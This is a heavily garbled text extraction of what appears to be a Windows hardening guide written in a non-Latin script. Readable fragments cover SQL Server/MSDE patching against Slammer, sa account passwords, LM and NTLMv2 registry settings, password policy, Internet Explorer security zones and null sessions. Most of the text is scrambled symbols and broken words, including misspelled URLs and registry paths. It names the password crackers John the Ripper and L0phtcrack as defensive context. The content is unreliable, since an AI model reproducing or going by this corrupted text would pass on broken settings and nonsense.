(8!
! " %&
"7 B
5! $l ' R4 S @ : %
9
456 123&
6
DY/ I
a K5
GDEFE UDP C 2A SQL/MSDE Monitor Service ? 2A& A
* AB •
-, < K
6
S @ : )
BH " - Y ) SL
MSDE 2000
?), ) ) - " ) - Y
UDP n 9 " F
User
& @
b
) %L
6
O*
'L 7
T
( ,H $
)-
#P<
#P< )
6-"
1
@ " U4 F
SB #P
< )
^
account
2#5
F
&1
e G
O*
'L 7
R4
N`6
0 <; !
) Domain
6- Y/ "
0,6
UDP 1434 7 4
,L
0, 5
6
0, 5
T
s}~
IP
!89
6h @ 0
? 5 TG' g ] Dos \ " F
_U )
7 B
5!
MSDE SQL/MSDE 1 , I
SQL/MSDE -, 6 U )
F
4 # " I'
' $l '(
' " MB/Sec - E 4 " j - 1
@ 2<
0
,K
3 I
F
I
Ms-SQL/MSDE Slammer (
!89
Multicast \ " $,
n . $W ,
$
,L
s}~ % <
, 6 3 j &'
-, 6 U )
FSystem Local
' - Y $,
3(E
Buffer Overflow
,
MSDE2000
H , , ) - 9* e G
$
$l '
0 5 SQL Pack 3a Server 2000 - 56
F
'
n 9"
( ,H ?
( E ?# C
85! ) W L 3
+
:
$-,< P
[ 7< & h
0,< ,6 3
3
#P
<
Pack Service # 7"+ H ; •
Pack Service
6*
2 3@ G2000
a" ,
SQL/MSDE Server 7.0 Service Pack 4
Pack 3a MSDE/SQL Server 2000 Service
P
!
G Pack Service # A
7" I A1A
8 9 Patch # 7"+ H ;
U)
6*
b
5
-, < K
6Patch 2 3@ "
-,< K
- Y
"
6h @ " ?
I
SQL/MSDE/MSDE -, 6
21 " ?
F Patch 2 3@ SL " ? 59
a
6@
I
0 5 - Y
') #
SQL/MSDE -, 6 U )
:
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
9
<+ &H J K 7 + ,Patch + H ; •
Patch # 7" I
L2
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 G A
&1A
8
Patch ?
$ Web MS02-061
I
0
-,
a 5 - Y
K
"
"2
9
-,< K Patch 2 3@ "
6h @ " ?
6 @ ) ? 59
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
I
GPack Service # A
7" I A1A
8 A
9 Patch # A
7"+ H A
; •
-, 6 U )
6*
- Y
b
' ) #
-, 6 U )
5
-, < K
-, < K
6Patch 2 3@ "
21 " ?
SQL/MSDE/MSDE
F Patch 2 3@ S L " ? 59
:
a
- Y
"
6 @
I
0
5
SQL/MSDE
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000 (MSDE 2000) MSDE
Patch # 7" I
A
9 M2
<+ &H J K 7 + ,Patch + H ; •
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 G A
&1A
8
Patch ?
$ Web MS02-061
I
0
-,
K
"2
9
I
0
-,
a 5 - Y
K
"
Patch 2 3@ "
6 @ ) ? 59
-,< K Patch 2 3@ "
6 @ ) ? 59
"2
9
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000( MSDE 2000) MSDE
C 5! l '? # GAuthentication Logging SQL Server ? 2A& A
*•
Enterprise Manager
785/ 2 1
),
_sa” (
"
n 9" ?
# G ;NA
8
A
sa Account #
0
, F, , e G
j *
$, <
-, < K 7
4"
Server Book Online
sa Account
P
!& ?
" - Y
O%A
•
1A, I
A+
3
_blank]
#
$ MSSQL/MSDE
P
!&
SQL/MSDE
-,< DY/ P
!&
("c 0
< , 63
H
Administrator (SA) Login System
2t
5: W L3
("c ? 59
- Y SQL/MSDE
SQL/MSDE -, 6 U )
0_
TG' g
5 ( ,H
2
^
- Y l 'account " 9
K 7,
5
0
_Server Properties Security ]
, account "
-, < 3 <] e 'j 4
^
?@ ? 5 TG' I
R4 7 ) X ("c
/] 0
7 ,H
the SQL Server Administrator Login j *
) ' ) #
%
& $, 5
MSDN
/
5
-, <
and Change the System Administrator Password by Using ) $ Changing
) , #4
I
-,< K
6
) 7 # 2 3@ " ?
MSDE Verify
0 5 - Y $sa Account S
I
MSSQL/MSDE I
A
U)
4 :
Domain
?
2
!
]
Z F^
B
. 7"
) _NT "), )
6 56
A
6 A•
GSQL/MSDE Server Agent 1A,
. $ SQL/MSDE Server Agent ) -, 6 U )
] Local System
)
A AM2A C A ? &A
I
7"
] SYSTEM
S @e G
U)
%H , /
MSSQL/MSDE
account Valid
) administrator domain
0 _XP
) pqqq "), )
0
,6 3
#P< )
%
T
?#
F
Z F Domain
$
a
4
"
:
2
auditing ) Windows NT Authentication ? 5 T G'
U)
$-, < F
7
#<
)& @
MSSQL/MSDEServer
0, K5 T G' ? @ C, E ) = H
"
, 6( E
N
6Login
'
? ,
U)
,
#4$? #
0, 5 - Y Authentication NT
#P< "
g
6- ),.
F) 3 )
: y
B'0
) ) 7c L W L3
R4 7
W 3
TCP/UDP
;! ,
? , 6U)
^ P
P
6
("c
6U )
4"
F 3
67
4"
N 4
( E
bP ) MSSQL
"E
$ SQL/MSDE -, 6 U )
"
67 4 z) 3 ) ) )
)
B
3 ? 5F
G5
SQL/MSDE
4
("c #
B'
0
B'
G5 )
R4 S @ %
y
y
wxss ) wxsx
$, <
wxsx ) wxss
- Y
^
1
@)j
0
^
!89
$
(E
25 "
- Y
TCP/UDP
l ' 67 4 "
6 @
a 5 - Y
I
"
-
Microsoft SQL/ MSDE Server 7.0 Security
-
Microsoft SQL/ MSDE Server 2000 Seurity
6h @ " ?
! " % &# 2
Windows Authentiction
% G
6
6A)
?
6, )
Q0
b
f
-, < -
) 6 '-,< d *
+
" - Y
+
" - Y
DZ
0
N` 6?),
)
" U 4 ? 5F
)
" )-
6%
6account
#
- 5 account
, N ) = G0 <
( #.
" I'
H
?@ =GX
P
!&
u
-)8!
/)
+
,6 3
F)
2
3- Y
R
0,< ? "
H
% !
3\P ? "
+
P!
F) ,
B
5! $
) X
a
P
!&
< ,K
,
75I
€
P
! & ,H ' ) = GX
F
6 1G'( E
6, 4 ,
4"
2 1
), ) 2 5
,6 3
<
6(& # " - Y ] -,< , K ?
+ $
0
-
6
\ ' i: 2 1
) E
-,< 2),
S @^
,K
•c $
P
! & ,H ' ) = GX account
-, < K
:
) -,
,6 3
=
9P
? @"
0
H , F7 , , e G
< TP,
,F , , ,
b
SB
'
!89
F ) -, < = G
U 4 0, <
F
) , K " U4 ? @] 0,<
_0
2
, K " U4 0 < ,6 3 N
1G' #
,
" - Y
)?
6" E ) 7 "
S[ ?@
0, 6
6
1G'$
, -,<
H _7) Y
&
P
P! &
) % ' DY/ I ?
?# ?
P! & 2
P
! & 2'
-
"E
5 $
/
C
5
?@
?@?
6A) $
!89
6&
H -, < -
?@
)
) T) ,
P
!
+
, K
"
P
!&
6& " ?
P
!&
? "
9
P
!
% <&
^P
R4
-,< = G Account •
S
DY/ (, ! •
0-,< = G
, account E ?# $ F
= GX
6 &'(
0, 5
4
5! , B
hashing 5
N1
"
-, < &
) ) ,
\ 2 P
-
F) 2
, 5 ,H
6& " - Y
0
2
), 5
0, 5
P
!& ?
5 T
0 <
X
,K
+
"
S
) ( #.
3 1
)
GP
2
W L3
6& "), )
_hashing
6 *1 E/
F) , K
_
"
Hash ,
[ 19
a
"
N1\
)
6
F
Hash ,
D
"
("c
("c
P
!
I5 $ P
!&
DY/
= G
7 L
,
- 3•
P! &
message digest] -
,
<R
?#
# b
E _ <
$hash ,
-,< 3 < 0_
P! &
d
•
6
E 0
?@ -,6
) - 3•M Y<
- Y ?
N1]
b
)d*
7
)
P
! & ,H ')
)-
/
SB
g
0 < ,6 3
?@
h
83 ( 'hash ,
, Hashe ,
6'
P
! & Hashing
N& ]
3
) -, <
N $-, @
%5G1
P
•
)% !
5
"), )
5 ] LM •
NTLM •
_ 5
LM] Lan Manager] "
LM
-, < Hash
^
XP, 2000 , "), )
LM #
F
0, 5
"
" 7,
5
#< $ F
$, <
P
!
6&
- 3•_
B
. 7
P
LM
,
( #.
6 &' * 7 , H
-,
%#< 2 ,
B
G' 6 # )
P
5 ] NTLMv2 •
)
) X "), ) B
G' 6b. Q #
e 'j 4 7 L _ <
NTLM, ] ' ) #
#< -
5/
"
,
] NT
GX) pqqs "), )
N& T,
"
- Y _NTLMv2
6& $, 5
) 7 ,H
1
),
& LANMAN Hashes]
= GX S 5
P
!
Z#
L "), )
P
!
6&
/,
) W 3 K6A) " - Y
Y6
0,< , 6 3
HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e
n-us/security/securiy/h-gly.asp
" % c, LM hashes =GX
a
0, <
0, <
% ,P
-
$ 13
0,
d *
&E
7 B
5!
Y6
H F
P
Qf
)
, 5 ! 5E )
2, )
Hashe d *
d *
& _dictionary- style]
P @ hashing LM A ) 2
6 <
0
Lan , K , @ 'SAM
Lmhashes "
)? ,
?@ )
K62<
A) %
HS
%H , / 0, <
P
!&
-
"), )
2
)d *
?
H F
6& •
Ih /
0,
2
F
6
F
- 3• :3 ) , ,
,F
-)8! 0
,6 3
e 'j 4 7 L ) SB
g Manager
#
("c 0
N1" - Y
6-
H$
' R4
-, < S L
I 5 hashes LM = GX
T
, K, @ ' ?
) 6 '_
,
' )n.
R4 S @ LM hashes A) " - Y
5! ?
P
!
K6 <
\X
- < # 2
6
F
K6 < 2
5
)
,K
5
P
!
, ` 4 0,< ,6 3 6 '
P
!&
U)
5 hash
6& •
P
!& d *
, 6 3 -, < 2 5 > ?@
)- 5
b
P
!
-
H, , e G
-, 6 U )
7 B
5!
$, <
#
6& •
0, -, < % , P • & M) /
Y6% < C
'
)-
P
!
-,< , K
/ S 5 ,<
#< C
/8:
6& •
_cracking]
),.
R 3 ) l '7 B
5! % 5#
S
P
!
hashing , @ ' 6
F
6
?# S
j &'Hash T 9
P
Y6j* )
C
'
+
>'" - Y
% ,P• & M) / C 5
0,
&
),.
!89
5
2
<] +5 l
0
,6 3
Y , 4
CG:H )
?# C
85!
P!
6& ? )@
GX)
,
- $() *
0,
H,, 2 e G
"), )
+
0
H F
U)
)- 5 V
&
( #.
- Y
"
6@
6
5
- <
%B
!)%c
"
#
%
/
0 5 - Y
1
) $, -,
?@
# 2
" E
'
B
.
"
)
0 ' ,6 3
#P<
!89
2
C,E
,6 3 S @ e G
$,<
-
5
) , 5 ,H
"
:
2
P! &
0, <
P
!
- 3• B
. )
•
Bc, #
<
F) -, 6 U )
( ,H 62 < " \ 2
! "
6& %
E
I 5 ("c
#B
5! .
- Y
•
0
" - Y = GX
0
2000. NT "), ) #
4 ) - 5 LM hashes T
<%
K6
H F
P, K , "
HS @e G
6" E
"2
0
LM
-,<
P
! & -, 6
- 3• # ) " I '
e 'j 4 7 L Lan Manager hahes
I5 ? "
b
,< ? , " ("c
a
, -,< SL e 'j 4 7 L XP,
K6
P
!
?5F
t6
F) C
8Q
)
("c
5 $
LAN Manager hash
^P
#
ZF
5
John the Ripper ) _LC44 ] 10phtcrack version " ?
"
5
TG' 6Account
6 &'(
?@
6*
! ". /0(123&
,
I 5 6A) 2 P
"
R 3 ?), 0,
:
3? "
6& cracking
P
!
d *
P
! & =GX
+,
,6 3 E
456 123&
\ '2 P
)2
6%5G1
%5
) ( #.
" ? 59
#.
I5 ? @
a
- 2N + ,P QR & Q;3
4
?
L•
P! &
6?
' T /2 !
' ? "W L3 )S
)-
6A) " - Y
P
! & -, 6 d *
A)
#
F
6
SB
g 0
0, 5
], <
2
" \ 2
0, <
_?@ =B*
:
%5
P
!
Y
_password] , 5
P
!
6&
O*
#
M /2 1
) 2' ]
)
,
"
<P?@
,1
P
"
P
!
M) / % , P ( ,H
?@ _
("c
2
? !7 P
!
'L
#) h
c 9 <
)@ ]
-,< F
"
&N F 5B 6
E
H?
_
7
-
-J)
("c 0 <
(E
" ) -,< -
1
) K5 - 3•
I ?
K6
5 $O 3 &
# 2
? "
2 ), " U4 _
, P4
H&
password
d *
6&
- <&
2 ?
)
P 785/ ?, < F
H I
T
\X
W 3
- 3•" M,6] ,<P %#
I 5 ("c %5G1
$-, < = G
( O
%5
P
!&
"
P
("c A" @ ?
3
#
/
) KP
Y1M) / "
!
-
5 MR / 5B
? @d *
6&
"
O* ,
M) /
P
!
%
) 5B
) " )@
M) / ) KP
Y1M) / "
*
6
"
, 6 3 785/
3?
5F
E ) O * W L3
B' (
-,< & %#<
" ,G0
)-
<
6
?@
-J ) M) / ) , !
-,< 3 < (
0 <-
N&
" - Y ) ,G
I5 ) - 5
0,< ,6 3 crack
0, < -,< h PH
),/
P
!&
"
-J )
= G
password ) - P
A)
"
<) "
,< -,< 3 < 5B
3
&
7 B
5! $& @
P 785/ P
6%#< %
-,< Y ? @
0, 5 = G
N F2
P
<" @ 6? "
6&
password (
C
'
P
!& d *
N F- 5 S
("c
0 5 crack
2
-, < 3 <
• ,G
= G - . W L3
Q
#
# 7 5B -, < &
P! &
?
(E
- Y
Hl ' 6
&' * " - Y
T#<
A" @ ) S
9*
&
" ) - 3•
P
!
6&
(8!
6%5G1
T 5! " U 4
" ?
P!
, 5 ,H
6&
Local
.
I5
2
PF 62 ) "
& 2
pqqs $XP $pqqq"), ) 0
6&
I 5 "), )
) 4 " ? 59
6*
)- Y
Q
"
0, <
$
?
b
6
" ?
&
:
- Y -,<
?
7
u
j &'
-,< = G
I5
-,6
a 5 TG' Securty Policy
Local Security Policy Program
Start Pr ograms Ad min istrativeTools Local Security Policy
Select: Account Policies, Then password Policy
a
? 5 TG' Password must meet complexity requirements
$l '
? "
, ` 4 ) ( #.
m .1
-, < = G
I5
P!
F
6 ,
!
6& $ 1/ 2
account ( "
0,<
*
0,<
a,<
" ! 5E
" -)
(&B
0, <
a,
% 5 ?
?@ " ) = G
" U4 )
3 B
P
H
"
P
!
(, ! W L3
? 5
P
!&
K6
% <
P
!&
_Z
A]
B
N
P
Y1• & M) / •
_z
a]
B
N
PY1
q
M) / •
6 H ] 6,6
_ %,µ, s/ ,! C
8Q] KP
Y1 g
,
"
5 $ P
!&
j< %H ,/
"
P! &
u ) E
E
)(5 % <
_{
U4
•
Policy Local Security
" 75 I
4(H
•
•
6
SB
g apassword history (range: 0-24 Enforce)
B
P
H P! & ?56C,E $ 3
5 d*
6& " - Y
?
"E ?
("c ? 59 #P< ? , $S
P
!& " - Y v
$l '
Z>
"
" - Y
0, 5 - Y
$, ,F -,< = G
P
! & 2,
2 , 0, <
, ,F
GX)
\X
,N
2 ) - )@
I
0,<
,
?
b
< TP,
, # 4 " U4 B '8
P
!
#P
<
6&
P! &
$ Y
5 $ P
!&
`*
d*
,
$") S /
0_, 5
$") S /
, 2'
P
!&
P
!&
I
_
u
_ P! ] 5! Q , /
P
!&
3
P
!&
u
H
B 'c
,< ,6 3
minimum password age , # 4 0,< maximum "
N
m.1& password history
u
5 ,H
) M , 6 -,
P
!&
P!
#
P
!&
0
? ,
(&B
LOG on 7 B
5! $?
:
F) ?), 0, < -, <
P
!
5
" - ), .
" U4 ) = G
_, 5
#
&1$,<
minimum
" 0, 5 #P<
F) ?
, ,F
F) ?
, ,F P
!
e 'j 4
$Characters Minimum password length 0-14
T 9 %H ,/ ] , 5
-
, b
, password history
0
_ P! &
3
S
d*
Y
password history % 1 2 , 0 < ,6 *
, G %H , / $l '
,P "
6
O * password History % 1 2, 0 < ,6 *
,
6& -,
("c ) - P ? "
P! & _ u] = G
O*
<( E
6 '? @
? " 7, ?,<
5
,
6& " , E - Y ? # ) -, <
2 ƒ e 'j 4
)(E
Y " j
password age minimum
,
-, < = G
,<
H?
l '? " 7, ] L *
I
_ P! ]
)F
$ Y
I
P
!&
0 Days Minimum password age (range:0-999) ‚, < , 6 3
d*
2'
Minimum password age 0, 6
)
[
(&B
-" F ?
&
)" " ,
u
# " % PH ] , 5
)
YB*
F) minimum password age
<
# " %P
H ] 0, 5
-
P
- Y
Maximum password age (range:0-999 days)
5! Q , / $l '
$l '
5K ) 5
GX)
u ?#
0,<
5!
P
!&
2
d*
P
!&
P! &
= G
T 9 %H , / :
("c
2
?
T 9 %H , / 0
#
MR /
P
!&
0, < ? "
0 '
I
F) 7 ) X $ Y
6
"
6 , ?
0, -
4 :
2
,
- ")
, W L3
)S
0 '
$ P! &
F) 'Y< ) d *
:
, $ #P< 7 !89
6? "
2
"
3
In the domain Store password using reversible encryption for all
N& " - Y
P! &
"
K6
?
, K , @ '( E
N&
W L3
"
("c
6&
P
!& ]
6
7
$-, < DY/
0
P! &
6 @
I
- 3•0
15G
P!
l'
P
!&
"
- 3•$ ) )
K6%# ) 4
-, < K & $, 5
6&
$, 5
- Y
- Y
?, < T G'2
" - Y
0 users
$l '
2
"
4 ? 5 m .1
d*
5/ 7 # $ :
I
P
!
2 7
, 5
) )
0_
I
- 3•
( &1 I
,G
0
6&
"
6
P )
" %51
E
I
?@ " ?
K6A) "
6account "
F$ 5 - Y ?
R4
#
6 -, `4
a
P
!
b3 n 9
from Command line Promp:
Net User Username/random
6)
56] -, ` 4 ) ' L
I
P
!
P
!&
6&
- Y
6
P
GH ) ?
& cracking
("c _
P
!
P
!
) -, < I5 S
^P
6
6&
F$ P
!
, @ '"
, < ? , " ("c " E S
("c " E S
6& $l '%5G1
P account
_T 9
# $l 'A) 0 <
5 )6&
*]
-
j 5 .Y
Service accounts
Y
&5
- <\ X
6
^P
A) 2
Stand alone
?),
" U 4 0 < - Y cracking
•
F
"
GX)
2
0
P
!
C, E
5 $? "
)
l '7 B
5!
crack ? @
$
?@
P!
) -,
$
6&
0
? @ \8 9
H?@
3
I
N
? "
(, ! 0, <
/ G ;3 A
$?
b
6&
3 ?#
-, < - 3•?@
SB
g 0 <-
v 4
6%5G1
) C 3 0 <I $?
DY/
:
? @ DY/ (,! 7
?
K6% '
I
'
DY/ ) ,<
A" @ ?
3
= GX
$ K6( 4 2 `
<
$
) [
>/
?@ "
,
<
)W 3
("c ) P
!
)
6&
-, < % L
, Y 5! ( 5 -,
("c 2
K ("c
6account
F
$, 5
6A" @ ?
<•
(E
MR/
2
1E
0
6 N4
0
^P
5
6
$
5 - Y
6account &5
)
:
,
P account
)
0
2
F
? , GA
,account
#P< )
0, <
4
'
0
K
B
5F " $,
P
!&
" %P
H)S
E
$6 )
H
6
F) ? N
,<
P
!&
3
("c
P
!"
“ and must be changed Your password has expired
O*
$, <
H,, e G
A" @
P! & 2 < (,! $ N
6&
,K
A
456 •
2A
N +A
,P
0 ' ,6 3
B
.
P
!
crack
("c
"]
$ P
P!
?@ ?,
6&
& $_ E
6
% <
P!
I
l '7 B
5!
$
O * - . W L3
6&
F
)
\ X
P
!&
P!
F
( E -,< DY/ 2<
( E -,< DY/ 2 <
-,< +H ) F
$
6
0
K6A) " - Y $= GX
, 5 ,H ) #.
%5G1
6&
. 7
$S
0
?
P!
craking
P
!&
B
1
I K6
&
N
:
^P
6account ? )&' I
1 -,< , K
) "
- 4 $,<
W 3 K62 )
5 ?@" - Y
0
?@ ?
(N "
K6account MR/ )
) X
3
"%
, ?@
, P4
'
account MR/ I
%L
0
S
, N)
)% !
b
- Y & $
F
P 4
-,< K
-, < K
3
- Y $, - 5 V
I
:
G 2N P
7 # " - Y
2
P$
%
/ ? 59
62 ) "
? "
# 54
:&N 0
1
6 „ 1 # 2 3@
56
1 P!
0
)?
3 -
+ $S&•
-)8! ?
$ P! &
6 & " $ #P
< 6U )
P
!&
, N $S
2, 0
0
lan
&N F
6,
& 2
LM A9(? 2A& * B •
G ;NA
8
_Version2] Ntlmv2 NT LAN Manager A) " - Y Manager
0
$, K
I
,6 3
6(& #
P )
I
#.
N& " - Y
E , B $ " T),F
a,6
?
$, 5
T
- 5 M 9
$NTMV2 v 4 |j1
LM
pqqq ) NT "), )
6=G
l ' BH
Rgistry key
Hive: HKEY_LOCAL_MACHINE
Key: System\CurrentControl Set\Control\LSA
Value: LMCompatibilityLevel
ValidRange: 0-5
Default :0
f4
Y 2
, ,
)d*
, K A) ) \ $l '
Q
4 •
a,<
7 # " & 6$NTLM ) LM A) h
v 4T
0 < 5 - Y NTMv2
NTLMV2
7 # " - Y
NTLM , K A) h
T
…p
NTMV2 , K A) h
T
…s
LM , K
;! DC
…x
) -,< NTLM ) LM , K
;! DC
…r
0
' R4 NTLMv2 , K C
'
…w
0
- Y
?
0 5 lan Manager , K i:
6
pqqq "), )
LAN
^P
0,
#4
75 I
, #4
("c :
$ Manager authentication level security: Network
I
) SP4NT "), ) $ 6
-, < S L ?@ " , G
)
? ,
U)
LM hashes T
"
5
("c 2
5 ,H ? ,
U)
NT Lan
?
E
4 ,
2
6& " - Y 7
?
I K6
$ NTLMv2
,
5 #
‡ NTLM " - Y
:
#
$, <
f4 , Controllers Domain
I
$l 'U )
0_ #P
< )
(&B
P LM
I
BH " - Y
) Y
_ {† "), )
hashing
0 5 T5! Domain Controller
0 '
6
SL " U4 0
0, <
$ 5 NTLMv2 " - Y
u?
)
6 ,
5 - Y Network Client Microsoft - 56
$, 5
?
O* S
l '
N 4] '
LMCompatibility (
,
)
Directory Services Client
?@ )
(5
NTMv2 " {† ) {r "), )
e 'j 4 7
I
2
) $ Manager authentication Level LAN
0,
)
( ,H ? @ "
Security Options ) Policies Local
O* S
pqqs ) XP "), )
) ,
I
) T G'Policy Local Security
&
•
# & XP ) pqqs $pqqq "), )
-,< K
SL
,
,
) {r "), )]
:
I
Manager,version
LMCompatibility Level
authentication level Manager
("c 0 '
U)
Send NTLMv2 Respone only\Refuse LM
I
)
), . T 5! $ :
MR / ^ P
B %K
& 2
? @ "
-
LM hashes E ? 5 TG' g
1
)-
-, < SL ? @ )
(E
2
l '7 B
5! T
$ "
) ,< ,6 *
Value on next
0
? ,
*&
•
LM hashes
& #
') #
C
'
F)
?@ " - Y
XP ) pqqs $ _
-, < E l ', B Windows 2000 Domain Controller )
5 - 3•&
LAN
- < # 2
6
E , B0
I
3•$ #P<
I
) SP2] 2000 "), )
,G
25
# GLmhash + A 1 A7T
"
) SAM
0
?#
Local Security Poclicy
,
#
0,6
$Lanman hashes $,<
E
$Xp ) pqqs "), )
& ? 5 T G' ?
0
password change Lan manager hash network security: Do not store
("c :
2
) Local Policies
6
$l '7
- <
hash LM "
0 '
# 2
#
"
I
M ,6
) T G'Policy Local Security
&
u T5! " U4 0,
O* S
Security Options
("c 0, < +H ) [
$-, < E 7
u -,< " , -
, ,F hashes LM E W L3
P
!&
- 3• :
)
("c
Y7
N 4C
'
$-,< K
6A)
F LM hashes ) 0,< , 6 3 MR/ $,6
Rgistry key
Hive: Hkey_local_Machine
Key:
System\Current ControlSet\Control\LSA\NolMHash
(E
u
3
6 & GSAM :(A
AVL + A
A
,WA
A
&
6A) " hashes
"
P
!
A
A
*& •
Hash A
AU;( + SA
A
0
6& ? )@
,
$ P
! & cracking
I
a, 5
4
"
I 2 , a #P< "
P
!
- Y
6& =
a
2
] #P<
F M, 6
- Y ethereal
0_
0-,< ˆK
6 #P< " - Y
#P
< 67
MR/ ) d *
I
, 1' pqqq ) NT4 "), )
b
< ,6 3
% '" - Y
_ C:\Winnt\System32\ Config
F) ?@
Q# ?#
"C
'
SAM % '0,< -,< " , -
?
0 )@
-
56) ), . Controllers Domain C L3
@ 78#
3
I
& Repair
F
) Lock "), )
N % !
, & 9
i: j &') SAM % ' Q
# "
("c
:
l '% '0SAM % ' Q
#
$l '% '0,<
2<
6& " ?
5!] SystemRoot%\System32\Config
C
% !
3
N 4
6
Backup
I
# &'
) -,< ' Backup 7 !89 "
0
a 5 - Y
" 7c
" ?
B5# 7 !89 R3
-
How to Disable LM Authentication on Windows NT
-
How to Enable NTLMv2 Authentication for Windows
95/98/2000/NT
-
New Registry Key to Remove LM Hashes from Active
Directory and Security Account Manager
E
! " % &#
$X
Internet Explorer (IE)
0
' ) #
?@
"), ) ( '784
N ( N ) Patch
5 $,
R4S
@^
h
IE
?
6T
R4 S @ ^
0
T#< ")
85/ ,
6
)
B
.
%
$ 6
K6 *
,6 3
"
5
IE
) ,G
F) "), )
)
K6
6
)
SB
g
" - Y 7 ) X, <
0
)
SL &
+
2 , ,F ) 2 3@ " 6)
0 < ,6 3
-,6
) IE W
F) IE
<
L3
("c
Windows U )
5
6
$, < -,
4
R4 S @ ^
- Y "), )
') #
6 &'(
/ $IE
)
,
F) ?,
0 <
?@
! ". /0(123&
)
#
6Patch
SL
#
http://windowsupdate.microsoft.com/
?
0
( E
"
) HFNetChk
" ?
,
F) '
Update Windows U )
)
#
Analyzer Microsoft
F Online
)
HS @), , e G
, < T G'
0 5
F) $, 5
C 5! ) SL
,6U )
$U#
+,
-, < - <
0 < ,6 3
)
#
) - *1 6,
)
6)
Z '?@ ,
$() *
7) Y
)
)Y
?5F
T
@^
6
Y $T G' 6
6% '
R4 S @
IE
$O) 7 Y. a I
.
#
R4S
b
l ' R4 S @ ^
Z F $0
6*
, 63
-, < ( E ? 5F
) MIME \ )
,6(E
0
$IE
)
IE -, < SL
, G 78 5/ ?
$"), ) U '
' &
$ B
.
-,< SL e 'j 4 O)
) -, < S L
" ?
2
$, < -,
6Patch
TG'update
0 5 - Y Baseline Security
Check Qualys Browser a I _O)
0 5 - Y $IE
GX)
P
)
F
&1 @
,<
6 &]
B
: )c
! " %&
IE
)
Y
- Y
)
2
-,< - <
R 4 S @ & IE 1
)
)-
5
I
#
B
! 0, Z
0, <
0
0, K5 ( N ) Z
- Y % H)
W L*
S @^
‰8
;!
("c
6patch
?@ $
6Service Pack
+ F Patch 2 3@
0 5 SL
)
("c :
&
N
'X
IE +
i.
%/
,
?
#4) I
$l '
3
7 # "
%
0, *
P
R4
#
IE
! 5E
IE
GX) ?
?@
a 5 TP
Inetnet
6%
bP
& O*
•
Custom Level ? 5 T G') Security Tab
& O*
•
4" - Y Z
T G'$
"
n 9 " Options
Tools
("c 2
0,
a <( E
%1
, $IE
"
F) (,! $
$-,< K Service Pack 2 3@
_†pp{pr]
6Patch
("c
0 5 - Y Explore 6 SP1 Internet a h @ " ?
2
F j< *
- Y 5/5IE *
4$
0
6Patch
("c
F SB
g W L3 2
$j< l ' *
- Y IE6.0 * " #
'
5
456 123&
R4 S @ ^
6*
K
P 785/ Q Zone.
R4 S @ ^
n. $ActiveX Controls ) Scripting Active
6@)7 I
l ' 6%
4"
-
) ?,<
Prompt for Allow paste operations via
& $Scripting j *
•
Clipboard n 9 "
("c
script
TG' g
I
. W L3
5 Active Scripting
0_, 5
- Y $l ' %
N4
- < # 2
4" 6
Download signed Active X Controls
O) "
Prompt
O*
("c] 0 < ( E
" ,G
& O*
$
•
Download unsigned Active X Controls
Initialize and script ActiveX Controls not
Disable
& O*
•
Disable
& O*
•
marked as safe
& $Microsoft j*
•
& $Microsoft VM j*
•
High safety for Java permissions
High safety for Java permissions
N 4) )F
6 B
4 i.
F
I
("c
0
across domains Access to data
0
TG' g Cross-site scripting
6" E
O* $
& $ Miscellaneous j *
P 785/ "
G5
^P
•
I 5 $sources
! " % &# R
Windows Remote Access Servies
#P< ^ P
)Y
-, < K
„ 1#
6%
^
6 „ 1 # ) 7 # $"), ) 7) Y
4)7 # "
-,< K
3
6 K
)
:
2
0, 5
,
6V < ? `56
$_PRC] 62 )
E
3 ')
#P
< 6 BH ) 7 #
0 3
"
) 6 '2 <
+
2
F +
GX)
, 5 ,H )
F ? &
&
3)-
3
,
"
) " g@
(, ! ) l '=GX ^
$? &
6 '? &
# l '%
< TP,
" 7,
F
-
)
3"
+
V <S
,
7 L
?5F
b
?@ "
?#
K
%
b
<R V <
) CIFS File
) - "
4_
(E
,
b
?&
)
K6 *
_
-
<
) F
"), )
)
,5
I ] 6h) ) ) 6
/ 6
!
DY/
- Y "
W L3
) P
Q M ,6 l '?
6% '
T
$ #P< V < S
? ,
_
)
#P
<
,
# 4 (, ! % 1
,
B
.
# 4 (,! % 1
, 1
)-
3 7 / pqqw T
"
2,
? &
" - Y
$ #P< V < i.
0, <
S
7 B
5! ( E ?# $l ' 6%# ) 4 0,<
CH ] 0, 5
F 7 # "
% '" - Y Z
-
$,
l '+
System Common Internet )
"
456 Q -NETBIOS
H #P<
#P< ? &
7 B
5!
"
- 5 6 '$?@
P l '(& # (SMB Block Message Server)]
%# ) 4
(
,G 7 5F
0
!
" - Y
)
6 '&
^P
K6 , 1' ) % 'V < ?# $"), ) % !
-, < <R V <
0
Logon NULL
6i
:< 8 Y
^P
6
) -
) "), )
4 6 3 $l '
5/ ) K
#P< 6%# ) 4 Q
Anonymous $7 B
F $NETBIOS #P<
) - "
6*
0, 5
0, 5
("c %
4 $ #P
<
E
6@
) 6 , 1' 3
) 6
I]
6 ' #P< ?
)
F +
2 < ) ?, 3 ?#
$ < ( E #P<
-, < <R V <
+
0 ' ,6 3 j6
. " : 7, ,
"
"
3
$ 3 ? #56
<R V <
P
,
)- Y Z
_ 6% '
#4 #
0
:3 )
Logon Anonymouse
Null Session
85! $Session
C
P
!& )( ]
l89 $_ 13Null Session
" 0
6U )
0
- Y
6
)
"), )NT ? G $Local System account
E n 9 " #P<
? G
$bP
7
L
6
A R4
3
:
l'
0, 5
Null Session
H$
$ P
H
^P
Local
,K
1/
6*
I5
Z F
0
*
?# $
"
%1
,
1
), 5
5 6 '
u ? # $pqqq "), ) " % P
H 6*
KN* 4
Session Null pqqq "), )
2 ) 6'
,
_
&
+
R
1
:
${†"), )CE $NT $pqqq $ME ) XP B B &
) 6N
,
,
# 4 $ &'(
- P< 7 5 I
H
0
)
- Y $? , 6 native
A R 4Null Session )
6
$?
)Z F B
.
0, 5
%#
$ 6-)
Z F computer account Local U )
H ) 6 'pqqq "), ) " % P
H
]
<+
I5
) pqqqLocal System account )
#
3
7 !89 j 5
null Session "), ) 0, 5
